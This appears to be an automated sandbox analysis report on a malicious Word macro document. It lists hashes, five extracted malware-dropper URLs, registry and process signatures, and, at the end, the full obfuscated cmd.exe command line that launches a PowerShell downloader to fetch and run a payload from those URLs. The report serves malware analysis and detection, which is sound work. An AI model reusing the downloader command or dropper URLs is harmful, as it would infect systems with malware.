f32bb24d114407e601968a2908030e4e12277051ed2d439efb99bf63204ad4b8

General

Target

63a5df4ae97bb27edf5bd67659935560_JaffaCakes118.doc
Size

176KB
MD5

63a5df4ae97bb27edf5bd67659935560
SHA1

782ac721cedd47fd6c2a0ef1c6d5d637a70fed20
SHA256

f32bb24d114407e601968a2908030e4e12277051ed2d439efb99bf63204ad4b8
SHA512

d329521898b9e1d70cfd32f7546bb875685430ed1b00b3a2cbdd9c2f545754edc1082d4466d84ba77914eba7081f4449536191fb05162137e86577d57f73a053
SSDEEP

3072:BxjnB29gb8onegCZ4B9s5l7sOB/izw2RW0ntt:Bxy3HM9Q5ERW

Score

10^/10

execution

Malware Config

Extracted

Language

ps1

Deobfuscated

URLs

exe.dropper

http://coopspage.com/fLCt

exe.dropper

http://butterbean.se/KKHaZ8Oh

exe.dropper

http://boutique-amour.jp/958Jf

exe.dropper

http://bike-nomad.com/wp-content/jBN92RTl

exe.dropper

http://websitedesigngarden.com/fmkE

Signatures

Process spawned unexpected child process 1 IoCs

This typically indicates the parent process was compromised via an exploit or macro.

Processes:

Cmd.exe

description	pid	pid_target	process	target process
Parent C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE is not expected to spawn this process	760	2492	Cmd.exe	WINWORD.EXE

Blocklisted process makes network request 7 IoCs

Processes:

powershell.exe

flow	pid	process
5	2468	powershell.exe
7	2468	powershell.exe
9	2468	powershell.exe
10	2468	powershell.exe
11	2468	powershell.exe
13	2468	powershell.exe
15	2468	powershell.exe

An obfuscated cmd.exe command-line is typically used to evade detection. 2 IoCs

Processes:

cmd.exeCmd.exe

pid process

1716 cmd.exe
760 Cmd.exe
Command and Scripting Interpreter: PowerShell 1 TTPs 1 IoCs
Start PowerShell.
execution

PowerShell
T1059.001

Processes:

powershell.exe

pid process

2468 powershell.exe
Drops file in Windows directory 1 IoCs

Processes:

WINWORD.EXE

description ioc process

File opened for modification C:\Windows\Debug\WIA\wiatrace.log WINWORD.EXE
Office loads VBA resources, possible macro or embedded object present

pid	process
1716	cmd.exe
760	Cmd.exe

pid	process
2468	powershell.exe

description	ioc	process
File opened for modification	C:\Windows\Debug\WIA\wiatrace.log	WINWORD.EXE

Modifies Internet Explorer settings 1 TTPs 31 IoCs

adware spyware

Modify Registry

T1112

Processes:

WINWORD.EXE

description	ioc	process
Key created	\REGISTRY\USER\S-1-5-21-330940541-141609230-1670313778-1000\Software\Microsoft\Internet Explorer\MenuExt\E&xport to Microsoft Excel	WINWORD.EXE
Key deleted	\REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\Default HTML Editor\shell\edit\COMMAND	WINWORD.EXE
Key created	\REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\Default HTML Editor\shell\edit\command	WINWORD.EXE
Key created	\REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\Default MHTML Editor	WINWORD.EXE
Key created	\REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\Default MHTML Editor\shell\edit	WINWORD.EXE
Key created	\REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\Default MHTML Editor\shell\edit\command	WINWORD.EXE
Set value (str)	\REGISTRY\USER\S-1-5-21-330940541-141609230-1670313778-1000\Software\Microsoft\Internet Explorer\Toolbar\ShowDiscussionButton = "Yes"	WINWORD.EXE
Key created	\REGISTRY\USER\S-1-5-21-330940541-141609230-1670313778-1000\Software\Microsoft\Internet Explorer\MenuExt\Se&nd to OneNote	WINWORD.EXE
Key deleted	\REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\Default HTML Editor\shell\edit	WINWORD.EXE
Key deleted	\REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\Default MHTML Editor\shell\edit	WINWORD.EXE
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\Default HTML Editor\shell\edit\ = "&Edit"	WINWORD.EXE
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\Default HTML Editor\shell\edit\command\ = "\"C:\\Program Files (x86)\\Microsoft Office\\Office14\\WINWORD.EXE\" /n \"%1\""	WINWORD.EXE
Set value (data)	\REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\Default HTML Editor\shell\edit\command\command = 7800620027004200560035002100210021002100210021002100210021004d004b004b0053006b0057004f0052004400460069006c00650073003e00620069002400540021005600210030005a003d007b0050006b00300076006d007e0041005a00750020002f006e002000220025003100220000000000	WINWORD.EXE
Key created	\REGISTRY\USER\S-1-5-21-330940541-141609230-1670313778-1000\Software\Microsoft\Internet Explorer\Toolbar	WINWORD.EXE
Key created	\REGISTRY\USER\S-1-5-21-330940541-141609230-1670313778-1000\Software\Microsoft\Internet Explorer\MenuExt	WINWORD.EXE
Key deleted	\REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\Default MHTML Editor\shell	WINWORD.EXE
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\Default MHTML Editor\shell\edit\ = "&Edit"	WINWORD.EXE
Set value (int)	\REGISTRY\USER\S-1-5-21-330940541-141609230-1670313778-1000\Software\Microsoft\Internet Explorer\MenuExt\Se&nd to OneNote\Contexts = "55"	WINWORD.EXE
Key deleted	\REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\Default HTML Editor\shell	WINWORD.EXE
Set value (data)	\REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\Default MHTML Editor\shell\edit\command\command = 7800620027004200560035002100210021002100210021002100210021004d004b004b0053006b0057004f0052004400460069006c00650073003e00620069002400540021005600210030005a003d007b0050006b00300076006d007e0041005a00750020002f006e002000220025003100220000000000	WINWORD.EXE
Key created	\REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\Default HTML Editor\shell\edit	WINWORD.EXE
Key created	\REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\Default MHTML Editor\shell	WINWORD.EXE
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\Default MHTML Editor\shell\edit\command\ = "\"C:\\Program Files (x86)\\Microsoft Office\\Office14\\WINWORD.EXE\" /n \"%1\""	WINWORD.EXE
Set value (str)	\REGISTRY\USER\S-1-5-21-330940541-141609230-1670313778-1000\Software\Microsoft\Internet Explorer\MenuExt\E&xport to Microsoft Excel\ = "res://C:\\PROGRA~2\\MICROS~1\\Office14\\EXCEL.EXE/3000"	WINWORD.EXE
Set value (int)	\REGISTRY\USER\S-1-5-21-330940541-141609230-1670313778-1000\Software\Microsoft\Internet Explorer\MenuExt\E&xport to Microsoft Excel\Contexts = "1"	WINWORD.EXE
Key deleted	\REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\Default HTML Editor	WINWORD.EXE
Key created	\REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\Default HTML Editor	WINWORD.EXE
Key deleted	\REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\Default MHTML Editor\shell\edit\COMMAND	WINWORD.EXE
Key deleted	\REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\Default MHTML Editor	WINWORD.EXE
Set value (str)	\REGISTRY\USER\S-1-5-21-330940541-141609230-1670313778-1000\Software\Microsoft\Internet Explorer\MenuExt\Se&nd to OneNote\ = "res://C:\\PROGRA~2\\MICROS~1\\Office14\\ONBttnIE.dll/105"	WINWORD.EXE
Key created	\REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\Default HTML Editor\shell	WINWORD.EXE

Modifies registry class 64 IoCs

Processes:

WINWORD.EXE

description	ioc	process
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{42042206-2D85-11D3-8CFF-005004838597}\Old Icon	WINWORD.EXE
Set value (data)	\REGISTRY\MACHINE\SOFTWARE\Classes\.htm\OpenWithList\Microsoft Word\shell\edit\command\command = 7800620027004200560035002100210021002100210021002100210021004d004b004b0053006b0057004f0052004400460069006c00650073003e00620069002400540021005600210030005a003d007b0050006b00300076006d007e0041005a00750020002f006e002000220025003100220000000000	WINWORD.EXE
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\.htm\OpenWithList\Microsoft Excel\shell\edit\command\ = "\"C:\\Program Files (x86)\\Microsoft Office\\Office14\\EXCEL.EXE\" /dde"	WINWORD.EXE
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\.mht\OpenWithList\WinWord.exe\shell\edit	WINWORD.EXE
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\.mht\OpenWithList\Microsoft Word\shell\edit\command\ = "\"C:\\Program Files (x86)\\Microsoft Office\\Office14\\WINWORD.EXE\" /n \"%1\""	WINWORD.EXE
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\htmlfile\DefaultIcon\ = "\"%1\""	WINWORD.EXE
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\mhtmlfile\shell\Edit	WINWORD.EXE
Key deleted	\REGISTRY\MACHINE\SOFTWARE\Classes\mhtmlfile\shell\Print	WINWORD.EXE
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\mhtmlfile\shell\Print\command\ = "\"C:\\Program Files (x86)\\Microsoft Office\\Office14\\msohtmed.exe\" /p %1"	WINWORD.EXE
Set value (data)	\REGISTRY\MACHINE\SOFTWARE\Classes\.mht\OpenWithList\Excel.exe\shell\edit\command\command = 7800620027004200560035002100210021002100210021002100210021004d004b004b0053006b0045005800430045004c00460069006c00650073003e00560069006a00710042006f006600280059003800270077002100460049006400310067004c00510020002f0064006400650000000000	WINWORD.EXE
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\htmlfile\shell\Edit\ = "&Edit"	WINWORD.EXE
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{42042206-2D85-11D3-8CFF-005004838597}\InprocServer32\ThreadingModel = "Apartment"	WINWORD.EXE
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\.htm\OpenWithList\Microsoft Word\shell\edit\command\ = "\"C:\\Program Files (x86)\\Microsoft Office\\Office14\\WINWORD.EXE\" /n \"%1\""	WINWORD.EXE
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{42042206-2D85-11D3-8CFF-005004838597}\InprocServer32\ = "C:\\Program Files (x86)\\Microsoft Office\\Office14\\msohevi.dll"	WINWORD.EXE
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\.mht\OpenWithList\Microsoft Excel\shell\edit\command	WINWORD.EXE
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\.mht\OpenWithList\Excel.exe\shell\edit\command	WINWORD.EXE
Key deleted	\REGISTRY\MACHINE\SOFTWARE\Classes\htmlfile\shell\Print	WINWORD.EXE
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\.htm\OpenWithList\Excel.exe\shell\edit\command	WINWORD.EXE
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\.mht\OpenWithList	WINWORD.EXE
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\.mht\OpenWithList\Excel.exe\shell\edit\ddeexec\topic\ = "system"	WINWORD.EXE
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{42042206-2D85-11D3-8CFF-005004838597}	WINWORD.EXE
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\.htm\OpenWithList\Microsoft Excel\shell\edit\ddeexec\topic	WINWORD.EXE
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\mhtmlfile\shell\Edit\ = "&Edit"	WINWORD.EXE
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\mhtmlfile\DefaultIcon\ = "\"%1\""	WINWORD.EXE
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\.mht\OpenWithList\Microsoft Word\shell\edit\ = "&Open"	WINWORD.EXE
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\.mht\OpenWithList\Microsoft Excel\shell\edit\command\ = "\"C:\\Program Files (x86)\\Microsoft Office\\Office14\\EXCEL.EXE\" /dde"	WINWORD.EXE
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\htmlfile\shell\Edit\command\ = "\"C:\\Program Files (x86)\\Microsoft Office\\Office14\\msohtmed.exe\" %1"	WINWORD.EXE
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{42042206-2D85-11D3-8CFF-005004838597}\InprocServer32	WINWORD.EXE
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\.htm\OpenWithList\WinWord.exe	WINWORD.EXE
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\mhtmlfile\shell\Edit\command\ = "\"C:\\Program Files (x86)\\Microsoft Office\\Office14\\msohtmed.exe\" %1"	WINWORD.EXE
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\.htm\OpenWithList	WINWORD.EXE
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\.htm\OpenWithList\Microsoft Word\shell\edit\command	WINWORD.EXE
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\.htm\OpenWithList\Microsoft Excel\shell\edit\ddeexec\application\ = "Excel"	WINWORD.EXE
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\.htm\OpenWithList\MSPub.exe\shell\edit\command\ = "\"C:\\Program Files (x86)\\Microsoft Office\\Office14\\MSPUB.EXE\" %1"	WINWORD.EXE
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\.mht\OpenWithList\Excel.exe	WINWORD.EXE
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\mhtmlfile\shellex\IconHandler\ = "{42042206-2D85-11D3-8CFF-005004838597}"	WINWORD.EXE
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\.mht\OpenWithList\Excel.exe\shell\edit	WINWORD.EXE
Key deleted	\REGISTRY\MACHINE\SOFTWARE\Classes\htmlfile\shell\Edit	WINWORD.EXE
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\.htm\OpenWithList\WinWord.exe\shell\edit\command\ = "\"C:\\Program Files (x86)\\Microsoft Office\\Office14\\WINWORD.EXE\" /n \"%1\""	WINWORD.EXE
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\.htm\OpenWithList\Excel.exe\shell\edit\ddeexec\application	WINWORD.EXE
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\mhtmlfile\shell\Edit\command	WINWORD.EXE
Key deleted	\REGISTRY\MACHINE\SOFTWARE\Classes\mhtmlfile\shell\Edit	WINWORD.EXE
Set value (data)	\REGISTRY\MACHINE\SOFTWARE\Classes\.mht\OpenWithList\Microsoft Word\shell\edit\command\command = 7800620027004200560035002100210021002100210021002100210021004d004b004b0053006b0057004f0052004400460069006c00650073003e00620069002400540021005600210030005a003d007b0050006b00300076006d007e0041005a00750020002f006e002000220025003100220000000000	WINWORD.EXE
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\.mht\OpenWithList\WinWord.exe\shell\edit\command\ = "\"C:\\Program Files (x86)\\Microsoft Office\\Office14\\WINWORD.EXE\" /n \"%1\""	WINWORD.EXE
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{42042206-2D85-11D3-8CFF-005004838597}\Old Icon\htmlfile	WINWORD.EXE
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\.htm\OpenWithList\WinWord.exe\shell\edit	WINWORD.EXE
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\.mht\OpenWithList\WinWord.exe\shell\edit\ = "&Open"	WINWORD.EXE
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID	WINWORD.EXE
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{42042206-2D85-11D3-8CFF-005004838597}\Version	WINWORD.EXE
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\mhtmlfile\DefaultIcon	WINWORD.EXE
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\.mht\OpenWithList\Excel.exe\shell\edit\ddeexec\ = "[open(\"%1\")]"	WINWORD.EXE
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\.mht\OpenWithList\Microsoft Publisher	WINWORD.EXE
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\htmlfile\DefaultIcon	WINWORD.EXE
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\htmlfile\shellex\IconHandler\ = "{42042206-2D85-11D3-8CFF-005004838597}"	WINWORD.EXE
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\.htm\OpenWithList\Excel.exe\shell\edit\ddeexec	WINWORD.EXE
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\.htm\OpenWithList\MSPub.exe\shell\edit\ = "&Open"	WINWORD.EXE
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\.mht\OpenWithList\Microsoft Word\shell\edit\command	WINWORD.EXE
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\.mht\OpenWithList\Microsoft Excel\shell\edit\ddeexec\topic\ = "system"	WINWORD.EXE
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\.mht\OpenWithList\Excel.exe\shell\edit\command\ = "\"C:\\Program Files (x86)\\Microsoft Office\\Office14\\EXCEL.EXE\" /dde"	WINWORD.EXE
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\.htm\OpenWithList\Excel.exe\shell\edit\ddeexec\topic\ = "system"	WINWORD.EXE
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\.mht\OpenWithList\Microsoft Excel\shell\edit	WINWORD.EXE
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\.mht\OpenWithList\Excel.exe\shell\edit\ = "&Open"	WINWORD.EXE
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\.mht\OpenWithList\Excel.exe\shell\edit\ddeexec\application	WINWORD.EXE
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\.htm\OpenWithList\Excel.exe\shell\edit\ddeexec\application\ = "Excel"	WINWORD.EXE

Suspicious behavior: AddClipboardFormatListener 1 IoCs

Processes:

WINWORD.EXE

pid process

2492 WINWORD.EXE
Suspicious behavior: EnumeratesProcesses 1 IoCs

Processes:

powershell.exe

pid process

2468 powershell.exe
Suspicious use of AdjustPrivilegeToken 1 IoCs

Processes:

powershell.exe

description pid process

Token: SeDebugPrivilege 2468 powershell.exe
Suspicious use of SetWindowsHookEx 2 IoCs

Processes:

WINWORD.EXE

pid process

2492 WINWORD.EXE
2492 WINWORD.EXE

pid	process
2492	WINWORD.EXE

pid	process
2468	powershell.exe

description	pid	process
Token: SeDebugPrivilege	2468	powershell.exe

pid	process
2492	WINWORD.EXE
2492	WINWORD.EXE

Suspicious use of WriteProcessMemory 16 IoCs

Processes:

WINWORD.EXECmd.execmd.exe

description	pid	process	target process
PID 2492 wrote to memory of 2888	2492	WINWORD.EXE	splwow64.exe
PID 2492 wrote to memory of 2888	2492	WINWORD.EXE	splwow64.exe
PID 2492 wrote to memory of 2888	2492	WINWORD.EXE	splwow64.exe
PID 2492 wrote to memory of 2888	2492	WINWORD.EXE	splwow64.exe
PID 2492 wrote to memory of 760	2492	WINWORD.EXE	Cmd.exe
PID 2492 wrote to memory of 760	2492	WINWORD.EXE	Cmd.exe
PID 2492 wrote to memory of 760	2492	WINWORD.EXE	Cmd.exe
PID 2492 wrote to memory of 760	2492	WINWORD.EXE	Cmd.exe
PID 760 wrote to memory of 1716	760	Cmd.exe	cmd.exe
PID 760 wrote to memory of 1716	760	Cmd.exe	cmd.exe
PID 760 wrote to memory of 1716	760	Cmd.exe	cmd.exe
PID 760 wrote to memory of 1716	760	Cmd.exe	cmd.exe
PID 1716 wrote to memory of 2468	1716	cmd.exe	powershell.exe
PID 1716 wrote to memory of 2468	1716	cmd.exe	powershell.exe
PID 1716 wrote to memory of 2468	1716	cmd.exe	powershell.exe
PID 1716 wrote to memory of 2468	1716	cmd.exe	powershell.exe

C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE
"C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE" /n "C:\Users\Admin\AppData\Local\Temp\63a5df4ae97bb27edf5bd67659935560_JaffaCakes118.doc"
1⤵
- Drops file in Windows directory
- Modifies Internet Explorer settings
- Modifies registry class
- Suspicious behavior: AddClipboardFormatListener
- Suspicious use of SetWindowsHookEx
- Suspicious use of WriteProcessMemory
PID:2492

C:\Windows\splwow64.exe
C:\Windows\splwow64.exe 12288
2⤵
PID:2888

C:\Windows\SysWOW64\Cmd.exe
Cmd wZRiwhJfF uoGFDZmwViVVuSwozQbK fiwFOrHBht & %co^m^S^p^E^c% /c ^c^M^d; ; ; /^V^ ^ ; ; /r" ;; (SE^T ^ Wt^b=nT1 1Hc ^aC5^ u^GQ HK^v nD0^ 5Jk L0^8 Nli ^MqW ^U2d 8zU ^e1I EKF ^aox cfg G^AZ^ 1^ym}^cAh}AKM{9^20hVR^vcrbBtdQU^azr8^c^5vL}P6T; s8k^7Jia6ov^e^E^sY^rT^Xob80t;s^K^jjGWrZm1eSXBY$^4^K^l z^T8s^wBGs^5U2e^x^bscAWJolYmrXO^hPW^P^x^-QyAthCWrR^kh^aTIttBA^w^Sy^Dp^;kN5^)^8w^1jDvUZHcX^Se1n^$VR^w l^VG^,5oyzP^iHcc^o^B^WGSd$J^l ^(3Sh^e^opwlgUTin^vm^Fc^4MdSAwa^2T^Yon^pJlUN^Hn6Hrw4JUoF2^ZD^LDh.^K29^fH^51ic^ya^dOV9$HQu{^S^5DyFXDrD1xt5Gx{OPV^)^2VQhhe^7rK6Vzdw^X$vF^z 3^TPn3C4^i7Pz w^RTznKpc^1^V Wh^9z$nM^8^(^7ESh9^M^Hc^UEBaC9^Ze^V76^r^re^hoKlAfi7^P^;op^T'p9^resJP^x^y^8Fe^k^bN.^I^L^M^'G^z5+Y^I9YywZbnA^Xdcsd$Ox^u^+InW'6Qc\Xg^0'2eN+u^sMpv^m8mqY0^e^w6Ctk^zh:f^OSvOLenOK^qe53^F$tlu=gV^Ej4a^WZIi^d^S9x^Z$nc^v^;e4S'Tim9^D^ ^M0^ekI^1Dfe^'eih 9ci=U^I^s^ io0Y0O^GbX1^YdvVM$^9te;^O^0Y^)Ox9'3gI@0^u^p'b^ j^(8S t81si^Q^Ip^lae^ApE lSkWx.ARI^'^IgtEAg^R^kl^cLmcM^UfWQz/^X^74^m^2Qto^t^oPcCn^c.rGCnPUEe7^LQdr8^srw^8Ya^k^gvg 43nJHEg4E^ziJy3sa9^O^egFnd^P^C8ep3OtLD^I^iA^a3sS^e^lbOnLef6hw^78^H/RvJ/^s^q^t:v^IHpO^YEtH3qt^f^jdhq^8^l^@^U^18lb^J^tTW^YsR^bqG2^WvI9ZaBNX5GBEDdjp^wZ/^F^Pc^tZY^wnwMhe2TCtk2tn34 ^o^lmUcNgi-^yr^Vp^E^g^T^wKg /Wtrmu^iZoyR^9^c^XBJ.xO^FdXb8ajcgmCM^Ko^S^Wtn^MOK-^d9^2^eRcok0^Cn^i9u ^bTs9/61^0/W^s^O:nEipvBot2PHtV^GA^h31w^@^jBkftCyJ9CH85^z25v^ph909Z^/iYFpfq^ijib^u.Qp^vrygqua2q^ohOAmL^wpa^b^jY^-L^ PeL5v^u^cM^pq2Fgia1^T^tF^JTunAV^oQWZbF3^9/Ti^5/sA5^:^G9Yp2cAtW^Plt^xLHh^RzS^@OtBhqW^dOjAc8ZE^uZ^Oq3aI^K^QH2^5f^Kt1FKyAQ/^ApC^eoijsBrv^.xgEnCjaa2y6e9S0^bgTlrQHbe^etzt6z^Ot5^h^AuX8cbi^Xk^/ynC/Z9^6^:^4Ecp^y E^t^fy^wt^HKWhhtd@^V18tgJMCbQUL^X^7PfN^Fj/^BP^WmMlr^ohHlcCm^j.^g4reZKr^gs4^OaaIMpyOhss^Cxp^WyOo^DAtoC^StcsCO/iM5/ylA:^XaNpiXAt^fU1to Nh^miG'3Qc=4^yLhK^Rgr^kyU^zi6^8^$X9a;tDRtseHnOy^T^eK^M^L^i6^EMlL8^1C^1^u^Sbw0re^l^0^U^WtM8.Qwi^t^q^7^Q^eO^UNNR52 ^SL^Ht^DY2c^Ay^m^eDL1^jXe9bgE^u^o^M^Jk-TwCwK^5^YeUkSn 47=ZoqfayOisn^kdq^i^z^$qL^B gmil8^6flQ^2Ceu^PBh^c^krsu34rCplex9twDhx^ow^S8p)&& ; ; fo^r ; ; ; /^L ; %^D ; ;; in ; ; (^ ; ^ ; ^1499^ -4 ^ +3) ; ; ; D^O ; ( ; ( ; ( ; ^SET 7^z=!7^z!!Wt^b:~%^D, 1!) ) )& ; ; i^f; ;; %^D;; ; ; ; ; ^Eq^u;^3 ;; ( ( (CA^L^L;; %7^z:^*7^z^!=% ) ; ) ; ) "
2⤵
- Process spawned unexpected child process
- An obfuscated cmd.exe command-line is typically used to evade detection.
- Suspicious use of WriteProcessMemory
PID:760

C:\Windows\SysWOW64\cmd.exe
cMd ; ; ; /V ; ; /r" ;; (SE^T ^ Wt^b=nT1 1Hc ^aC5^ u^GQ HK^v nD0^ 5Jk L0^8 Nli ^MqW ^U2d 8zU ^e1I EKF ^aox cfg G^AZ^ 1^ym}^cAh}AKM{9^20hVR^vcrbBtdQU^azr8^c^5vL}P6T; s8k^7Jia6ov^e^E^sY^rT^Xob80t;s^K^jjGWrZm1eSXBY$^4^K^l z^T8s^wBGs^5U2e^x^bscAWJolYmrXO^hPW^P^x^-QyAthCWrR^kh^aTIttBA^w^Sy^Dp^;kN5^)^8w^1jDvUZHcX^Se1n^$VR^w l^VG^,5oyzP^iHcc^o^B^WGSd$J^l ^(3Sh^e^opwlgUTin^vm^Fc^4MdSAwa^2T^Yon^pJlUN^Hn6Hrw4JUoF2^ZD^LDh.^K29^fH^51ic^ya^dOV9$HQu{^S^5DyFXDrD1xt5Gx{OPV^)^2VQhhe^7rK6Vzdw^X$vF^z 3^TPn3C4^i7Pz w^RTznKpc^1^V Wh^9z$nM^8^(^7ESh9^M^Hc^UEBaC9^Ze^V76^r^re^hoKlAfi7^P^;op^T'p9^resJP^x^y^8Fe^k^bN.^I^L^M^'G^z5+Y^I9YywZbnA^Xdcsd$Ox^u^+InW'6Qc\Xg^0'2eN+u^sMpv^m8mqY0^e^w6Ctk^zh:f^OSvOLenOK^qe53^F$tlu=gV^Ej4a^WZIi^d^S9x^Z$nc^v^;e4S'Tim9^D^ ^M0^ekI^1Dfe^'eih 9ci=U^I^s^ io0Y0O^GbX1^YdvVM$^9te;^O^0Y^)Ox9'3gI@0^u^p'b^ j^(8S t81si^Q^Ip^lae^ApE lSkWx.ARI^'^IgtEAg^R^kl^cLmcM^UfWQz/^X^74^m^2Qto^t^oPcCn^c.rGCnPUEe7^LQdr8^srw^8Ya^k^gvg 43nJHEg4E^ziJy3sa9^O^egFnd^P^C8ep3OtLD^I^iA^a3sS^e^lbOnLef6hw^78^H/RvJ/^s^q^t:v^IHpO^YEtH3qt^f^jdhq^8^l^@^U^18lb^J^tTW^YsR^bqG2^WvI9ZaBNX5GBEDdjp^wZ/^F^Pc^tZY^wnwMhe2TCtk2tn34 ^o^lmUcNgi-^yr^Vp^E^g^T^wKg /Wtrmu^iZoyR^9^c^XBJ.xO^FdXb8ajcgmCM^Ko^S^Wtn^MOK-^d9^2^eRcok0^Cn^i9u ^bTs9/61^0/W^s^O:nEipvBot2PHtV^GA^h31w^@^jBkftCyJ9CH85^z25v^ph909Z^/iYFpfq^ijib^u.Qp^vrygqua2q^ohOAmL^wpa^b^jY^-L^ PeL5v^u^cM^pq2Fgia1^T^tF^JTunAV^oQWZbF3^9/Ti^5/sA5^:^G9Yp2cAtW^Plt^xLHh^RzS^@OtBhqW^dOjAc8ZE^uZ^Oq3aI^K^QH2^5f^Kt1FKyAQ/^ApC^eoijsBrv^.xgEnCjaa2y6e9S0^bgTlrQHbe^etzt6z^Ot5^h^AuX8cbi^Xk^/ynC/Z9^6^:^4Ecp^y E^t^fy^wt^HKWhhtd@^V18tgJMCbQUL^X^7PfN^Fj/^BP^WmMlr^ohHlcCm^j.^g4reZKr^gs4^OaaIMpyOhss^Cxp^WyOo^DAtoC^StcsCO/iM5/ylA:^XaNpiXAt^fU1to Nh^miG'3Qc=4^yLhK^Rgr^kyU^zi6^8^$X9a;tDRtseHnOy^T^eK^M^L^i6^EMlL8^1C^1^u^Sbw0re^l^0^U^WtM8.Qwi^t^q^7^Q^eO^UNNR52 ^SL^Ht^DY2c^Ay^m^eDL1^jXe9bgE^u^o^M^Jk-TwCwK^5^YeUkSn 47=ZoqfayOisn^kdq^i^z^$qL^B gmil8^6flQ^2Ceu^PBh^c^krsu34rCplex9twDhx^ow^S8p)&& ; ; fo^r ; ; ; /^L ; %^D ; ;; in ; ; (^ ; ^ ; ^1499^ -4 ^ +3) ; ; ; D^O ; ( ; ( ; ( ; ^SET 7^z=!7^z!!Wt^b:~%^D, 1!) ) )& ; ; i^f; ;; %^D;; ; ; ; ; ^Eq^u;^3 ;; ( ( (CA^L^L;; %7^z:^*7^z^!=% ) ; ) ; ) "
3⤵
- An obfuscated cmd.exe command-line is typically used to evade detection.
